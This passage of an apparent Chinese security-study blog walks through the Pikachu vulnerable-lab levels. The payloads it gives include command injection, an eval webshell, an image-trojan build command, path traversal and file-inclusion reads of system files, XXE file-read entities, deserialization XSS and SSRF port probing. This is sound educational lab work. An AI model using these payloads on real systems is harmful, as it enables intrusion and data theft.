可能导致一个用户能够查看另一个用户的信息</p></li><li><p>在登录lucy账号之后, 将上面get请求中的lucy改为其他用户名(比如lili), 发现可以访问<br><img src="https://i0.imgs.ovh/2024/02/07/b9W5u.png"></p></li></ul><h4 id="垂直越权"><a href="#垂直越权" class="headerlink" title="垂直越权"></a>垂直越权</h4><ul><li><p>这关里pikachu是普通管理员, admin是超级管理员, 其中只有超级管理员能够执行增加用户的操作</p></li><li><p>先抓取超级管理员执行增加用户的数据包, 然后退出登录, 改为登录普通管理员的账号, 将获取到的数据包的请求头中的cookie替换为pikachu的cookie, 在请求体中填入增加用户的信息</p><p><img src="https://i0.imgs.ovh/2024/02/07/b9KRI.png"></p></li></ul><h2 id="RCE-命令执行漏洞"><a href="#RCE-命令执行漏洞" class="headerlink" title="RCE-命令执行漏洞"></a>RCE-命令执行漏洞</h2><h3 id="概述-5"><a href="#概述-5" class="headerlink" title="概述"></a>概述</h3><ul><li>可以让攻击者总直接注入命令或恶意代码, 控制服务器后台</li></ul><h4 id="远程系统命令执行"><a href="#远程系统命令执行" class="headerlink" title="远程系统命令执行"></a>远程系统命令执行</h4><ul><li><p><strong>原理</strong>: 系统上存在给用户提供特点的远程命令操作的接口(如ping), 但是没有严格的安全控制措施</p></li><li><p>例如: </p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]))</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">host </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">host</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">shell_exec</span><span style="color: #89DDFF">(</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">ping -c 4 </span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">host</span><span style="color: #89DDFF">}"</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">res</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div></li><li><p>此时如果输入<code>127.0.0.1; ipconfig</code>就会把后面的命令也执行</p></li></ul><h3 id="Pikachu关卡-5"><a href="#Pikachu关卡-5" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="ping-远程系统命令执行"><a href="#ping-远程系统命令执行" class="headerlink" title="ping-远程系统命令执行"></a>ping-远程系统命令执行</h4><ul><li>可使用<code>|</code>, <code>||</code>, <code>&</code>等进行拼接, 估计没做过滤处理<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20170114.png?raw=true"></li></ul><h4 id="eval-远程代码执行"><a href="#eval-远程代码执行" class="headerlink" title="eval-远程代码执行"></a>eval-远程代码执行</h4><ul><li><p>根据提示, 后台大概是使用了<code>eval()</code>函数</p></li><li><p>尝试输入<code>phpinfo();</code>, 查看是否可以执行代码<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20170509.png?raw=true"></p></li><li><p>证明可以执行任意代码, 通过hackbar得知key为<code>txt</code>, 使用蚁剑尝试连接</p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20171007.png?raw=true"></p></li><li><p>拿下webshell</p></li></ul><h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><h3 id="概述-6"><a href="#概述-6" class="headerlink" title="概述"></a>概述</h3><ul><li><code>include(),require(),include_once(),require_once()</code>会解析执行php文件</li><li>在<code>allow_url_include</code>, <code>allow_url_fopen</code>为<code>on</code>时还可以通过url地址对远程的文件进行包含, 一般会配合伪协议</li></ul><h3 id="Pikachu关卡-6"><a href="#Pikachu关卡-6" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h4><ul><li><p>通过观察url, 有一个参数为fileX.php, X为1~5<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20172345.png?raw=true"></p></li><li><p>尝试用别的文件, 比如file6.php<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20172548.png?raw="></p></li><li><p>可以看到解析了file6.php的内容, 获取了一些信息</p></li></ul><h4 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h4><ul><li><p>除了本地文件包含, 还可以通过http协议或php伪协议进行包含, 例如通过<code>php://filter/read</code>进行源码的获取<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20173642.png?raw="></p></li><li><p>解码后可获取源码<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20173853.png?raw="></p></li></ul><h2 id="不安全的文件下载"><a href="#不安全的文件下载" class="headerlink" title="不安全的文件下载"></a>不安全的文件下载</h2><h3 id="概述-7"><a href="#概述-7" class="headerlink" title="概述"></a>概述</h3><ul><li>在下载功能中, 如果攻击者提交的不是一个程序预期的的文件名,而是一个精心构造的路径(比如../../../etc/passwd),则很有可能会直接将该指定的文件下载下来。 从而导致后台敏感信息(密码文件、源代码等)被下载。</li></ul><h3 id="Pikachu关卡-7"><a href="#Pikachu关卡-7" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li><p>下载链接如下:<br><code>http://192.168.5.143:7090/vul/unsafedownload/execdownload.php?filename=kb.png</code></p></li><li><p>尝试将文件<code>kb.png</code>改为其它路径的文件,比如当前页面的文件<code>../down_nba.php</code>, 发现可以下载<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20174553.png?raw="></p></li><li><p>以此类推, 几乎所有文件都可以下载, 比如C盘中的系统配置文件system.ini<br><code>http://192.168.5.143:7090/vul/unsafedownload/execdownload.php?filename=../../../../../../Windows/system.ini</code></p></li></ul><h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><h3 id="概述-8"><a href="#概述-8" class="headerlink" title="概述"></a>概述</h3><ul><li><a href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E9%80%9A%E7%94%A8%E6%BC%8F%E6%B4%9E#%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0">通用漏洞-文件上传| Myprefer’s Blog</a></li></ul><h3 id="Pikachu关卡-8"><a href="#Pikachu关卡-8" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><h4 id="客户端check"><a href="#客户端check" class="headerlink" title="客户端check"></a>客户端check</h4><ul><li>只在客户端检查, 修改js或抓包改包即可绕过<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20175850.png?raw="></li></ul><h4 id="服务端check"><a href="#服务端check" class="headerlink" title="服务端check"></a>服务端check</h4><ul><li>抓包, 将其中的文件类型改为image/jpeg即可</li></ul><h4 id="getimagesize"><a href="#getimagesize" class="headerlink" title="getimagesize()"></a>getimagesize()</h4><ul><li><p>getimagesize()函数会获取图片信息, 需要伪造图片马才能绕过</p></li><li><p>用命令<code>copy tmp.png/b+eval.php 1.jpg</code>生成图片马</p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20180938.png?raw="></p></li><li><p>可以看到一句话木马拼接到了jpg文件中</p></li><li><p>上传后, 由于木马文件为jpg后缀, 无法直接执行, 但可以结合文件包含漏洞使用:<br><code>http://192.168.1.5/pikachu/vul/fileinclude/fi_local.phpfilename=file:///C:\phpstudy_pro\WWW\pikachu\vul\unsafeupload\uploads\1.jpg</code></p></li></ul><h2 id="目录遍历"><a href="#目录遍历" class="headerlink" title="目录遍历"></a>目录遍历</h2><h3 id="概述-9"><a href="#概述-9" class="headerlink" title="概述"></a>概述</h3><ul><li><p>在 Web 功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活, 当用户发起一个前端的请求时,便会将请求的这个文件的值(比如文件名称)传递到后台,后台再执行其对应的文件</p></li><li><p>在这个过程中,如果后台没有对前端传进来的值进行严格的安全考虑,则攻击者可能会通过<code>../</code>这样的手段让后台打开或者执行一些其他的文件,从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞</p></li></ul><h3 id="Pikachu关卡-9"><a href="#Pikachu关卡-9" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li><strong>title</strong>参数可通过<code>../</code>进入任意目录, 造成信息泄露, 比如读取system.ini文件信息<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20182400.png?raw="></li></ul><h2 id="敏感信息泄露"><a href="#敏感信息泄露" class="headerlink" title="敏感信息泄露"></a>敏感信息泄露</h2><h3 id="概述-10"><a href="#概述-10" class="headerlink" title="概述"></a>概述</h3><ul><li>由于后台人员的疏忽或者不当的设计,导致不应该被前端用户看到的数据被轻易的访问到<ul><li>通过访问url下的目录,可以直接列出目录下的<strong>文件列表</strong></li><li><strong>报错信息</strong>里面包含操作系统、中间件、开发语言的版本或其他信息;</li><li><strong>前端源码</strong>里面包含了敏感信息</li></ul></li></ul><h3 id="Pikachu关卡-10"><a href="#Pikachu关卡-10" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li>前端代码中泄露了敏感信息<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20182757.png?raw="></li></ul><h2 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h2><h3 id="概述-11"><a href="#概述-11" class="headerlink" title="概述"></a>概述</h3><ul><li><a href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">WEB攻防-反序列化 | Myprefer’s Blog</a></li></ul><h3 id="Pikachu关卡-11"><a href="#Pikachu关卡-11" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li><p>此漏洞利用需要代码审计, 漏洞代码:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">var</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">test </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">pikachu</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">function</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">__construct</span><span style="color: #89DDFF">(){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$this-></span><span style="color: #BABED8">test</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">''</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(</span><span style="color: #82AAFF">isset</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">o</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">])){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">s </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">o</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF; font-style: italic">if</span><span style="color: #89DDFF">(!@$</span><span style="color: #BABED8">unser </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">unserialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">s</span><span style="color: #89DDFF">)){</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p>大兄弟,来点劲爆点儿的!</p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span><span style="color: #89DDFF; font-style: italic">else</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">html</span><span style="color: #89DDFF">.="</span><span style="color: #C3E88D"><p></span><span style="color: #89DDFF">{$</span><span style="color: #BABED8">unser</span><span style="color: #89DDFF">-></span><span style="color: #BABED8">test</span><span style="color: #89DDFF">}</span><span style="color: #C3E88D"></p></span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #89DDFF">}</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">}</span></span></code></pre></div></li><li><p>据此生成payload的代码</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #BABED8">php</span></span><span class="line"><span style="color: #C792EA">class</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">{</span></span><span class="line"><span style="color: #BABED8"> </span><span style="color: #C792EA">var</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">test </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">123333</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">;</span></span><span class="line"><span style="color: #89DDFF">}</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">a </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">new</span><span style="color: #BABED8"> </span><span style="color: #FFCB6B">S</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">echo</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">serialize</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">a</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">?></span></span></code></pre></div><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20184225.png?raw="></p></li><li><p>发现可以用来构造xss, 比如<code>O:1:"S":1:{s:4:"test";s:25:"<script>alert(1)</script>";}</code><br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20184518.png?raw="></p></li></ul><h2 id="XXE-xml外部实体注入漏洞"><a href="#XXE-xml外部实体注入漏洞" class="headerlink" title="XXE-xml外部实体注入漏洞"></a>XXE-xml外部实体注入漏洞</h2><h3 id="概述-12"><a href="#概述-12" class="headerlink" title="概述"></a>概述</h3><ul><li>XXE:XML External Entity attack(XML外部实体攻击)。其实XXE就是攻击者自定义了XML文件进行了执行</li></ul><h4 id="XML-DTD"><a href="#XML-DTD" class="headerlink" title="XML&DTD"></a>XML&DTD</h4><ul><li>XML(Extensible Markup Language),全称为可扩展标记语言,是一种传输的数据格式</li><li>DTD(Document Type Definition),全称为文档类型定义,是XML文档中的一部分,用来定义元素, <strong>对xml文档定义语义约束</strong>。</li></ul><h4 id="XML结构"><a href="#XML结构" class="headerlink" title="XML结构"></a>XML结构</h4><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #676E95; font-style: italic"><!--第一部分: XML声明--></span></span><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF">?></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--第二部分: 文档类型定义DTD--></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">note</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">entity-name</span><span style="color: #F78C6C"> SYSTEM </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">URL/URL</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"></span><span class="line"><span style="color: #676E95; font-style: italic"><!--第三部分: 文档元素--></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">to</span><span style="color: #89DDFF">></span><span style="color: #BABED8">123</span><span style="color: #89DDFF"></</span><span style="color: #F07178">to</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">from</span><span style="color: #89DDFF">></span><span style="color: #BABED8">abc</span><span style="color: #89DDFF"></</span><span style="color: #F07178">from</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">head</span><span style="color: #89DDFF">></span><span style="color: #BABED8">xyz</span><span style="color: #89DDFF"></</span><span style="color: #F07178">head</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">body</span><span style="color: #89DDFF">></span><span style="color: #BABED8">hhhh</span><span style="color: #89DDFF"></</span><span style="color: #F07178">body</span><span style="color: #89DDFF">></span></span><span class="line"><span style="color: #89DDFF"></</span><span style="color: #F07178">note</span><span style="color: #89DDFF">></span></span></code></pre></div><h4 id="外部实体引用payload"><a href="#外部实体引用payload" class="headerlink" title="外部实体引用payload"></a>外部实体引用payload</h4><div class="language-xml"><button title="Copy code" class="copy"></button><span class="lang">xml</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF"><?</span><span style="color: #F07178">xml</span><span style="color: #C792EA"> version</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">1.0</span><span style="color: #89DDFF">"</span><span style="color: #C792EA"> encoding</span><span style="color: #89DDFF">=</span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">UTF-8</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ?></span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">DOCTYPE</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">ANY</span><span style="color: #89DDFF"> [ </span></span><span class="line"><span style="color: #89DDFF"><!</span><span style="color: #F78C6C">ENTITY</span><span style="color: #89DDFF"> </span><span style="color: #BABED8">SYSTEM</span><span style="color: #89DDFF"> </span><span style="color: #89DDFF">"</span><span style="color: #C3E88D">file:///flag</span><span style="color: #89DDFF">"</span><span style="color: #89DDFF"> ></span></span><span class="line"><span style="color: #89DDFF">]></span></span><span class="line"><span style="color: #89DDFF"><</span><span style="color: #F07178">x</span><span style="color: #89DDFF">>&</span><span style="color: #BABED8">f</span><span style="color: #89DDFF">;</</span><span style="color: #F07178">x</span><span style="color: #89DDFF">></span></span></code></pre></div><h3 id="Pikachu关卡-12"><a href="#Pikachu关卡-12" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li><p>payload:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8"><?xml version = "1.0"?></span></span><span class="line"><span style="color: #babed8"><!DOCTYPE ANY [</span></span><span class="line"><span style="color: #babed8"> <!ENTITY f SYSTEM "file:///Windows/system.ini"></span></span><span class="line"><span style="color: #babed8">]></span></span><span class="line"><span style="color: #babed8"><x>&f;</x></span></span></code></pre></div></li><li><p>可以读取任意文件<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20195858.png?raw="></p></li></ul><h2 id="不安全的url跳转"><a href="#不安全的url跳转" class="headerlink" title="不安全的url跳转"></a>不安全的url跳转</h2><h3 id="概述-13"><a href="#概述-13" class="headerlink" title="概述"></a>概述</h3><ul><li>如果后端采用了前端传进来的(可能是用户传参,或者之前预埋在前端页面的url地址)参数作为了跳转的目的地,而又没有做判断的话, 就可能发生”跳错对象”的问题。</li><li>危害: 钓鱼</li></ul><h3 id="Pikachu关卡-13"><a href="#Pikachu关卡-13" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li>点击第三句话时会进行一个跳转, 正确的跳转应该是转到概述页面, 发现网页通过参数<code>url</code>确定跳转目标<br><code>http://192.168.5.146:7090/vul/urlredirect/urlredirect.php?url=unsafere.php</code></li><li>这里参数url可以改成任意url, 比如<code>url=https://google.com</code>, 可跳转到对应网页, 可用于钓鱼攻击</li></ul><h2 id="SSRF-服务端请求伪造"><a href="#SSRF-服务端请求伪造" class="headerlink" title="SSRF-服务端请求伪造"></a>SSRF-服务端请求伪造</h2><h3 id="概述-14"><a href="#概述-14" class="headerlink" title="概述"></a>概述</h3><ul><li><p>服务端提供了<strong>从其他服务器应用</strong>获取数据的功能且没有对目标地址做过滤与限制</p></li><li><p>数据流: 攻击者–>服务器–>目标地址</p></li></ul><h4 id="产生SSRF漏洞的函数"><a href="#产生SSRF漏洞的函数" class="headerlink" title="产生SSRF漏洞的函数"></a>产生SSRF漏洞的函数</h4><ul><li><p><strong>file_get_contents</strong></p><p> 从指定url读取文件:</p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">content </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">file_get_contents</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">]);</span><span style="color: #BABED8"> </span></span></code></pre></div></li><li><p><strong>fsockopen</strong></p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$fp = fsockopen($host, intval($port), $errno, $errstr, 30); </span></span></code></pre></div></li><li><p><strong>curl_exec</strong></p><div class="language-php"><button title="Copy code" class="copy"></button><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">link </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">$</span><span style="color: #BABED8">_POST</span><span style="color: #89DDFF">[</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">url</span><span style="color: #89DDFF">'</span><span style="color: #89DDFF">];</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">curlobj </span><span style="color: #89DDFF">=</span><span style="color: #BABED8"> </span><span style="color: #82AAFF">curl_init</span><span style="color: #89DDFF">();</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_POST</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">0</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8">CURLOPT_URL</span><span style="color: #89DDFF">,$</span><span style="color: #BABED8">link</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #82AAFF">curl_setopt</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> CURLOPT_RETURNTRANSFER</span><span style="color: #89DDFF">,</span><span style="color: #BABED8"> </span><span style="color: #F78C6C">1</span><span style="color: #89DDFF">);</span></span><span class="line"><span style="color: #89DDFF">$</span><span style="color: #BABED8">result</span><span style="color: #89DDFF">=</span><span style="color: #82AAFF">curl_exec</span><span style="color: #89DDFF">($</span><span style="color: #BABED8">curlobj</span><span style="color: #89DDFF">);</span></span></code></pre></div></li></ul><p><em><strong>还可以使用伪协议</strong></em></p><h3 id="Pikachu关卡-14"><a href="#Pikachu关卡-14" class="headerlink" title="Pikachu关卡"></a>Pikachu关卡</h3><ul><li><p>使用了<code>curl_exec()</code>函数发送请求, 可以用来探测内网信息, 比如探测3306端口:<code>http://192.168.5.146:7090/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1:3306</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20203750.png?raw="></p></li><li><p>利用file协议读取任意服务器文件:<code>http://192.168.5.146:7090/vul/ssrf/ssrf_c</code><br><code>url.php?url=file:///C:/Windows/system.ini</code></p><p><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20204301.png?raw="></p></li><li><p>利用dict协议扫描内网主机开放端口:<br><img src="https://github.com/Myprefer/ImageHost/blob/main/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202024-04-21%20204540.png?raw="></p></li></ul>]]></content>
<summary type="html"><h1 id="Pikachu靶场实操"><a href="#Pikachu靶场实操" class="headerlink" title="Pikachu靶场实操"></a>Pikachu靶场实操</h1><h2 id="暴力破解"><a href="#暴力破解" class="</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
</entry>
</feed>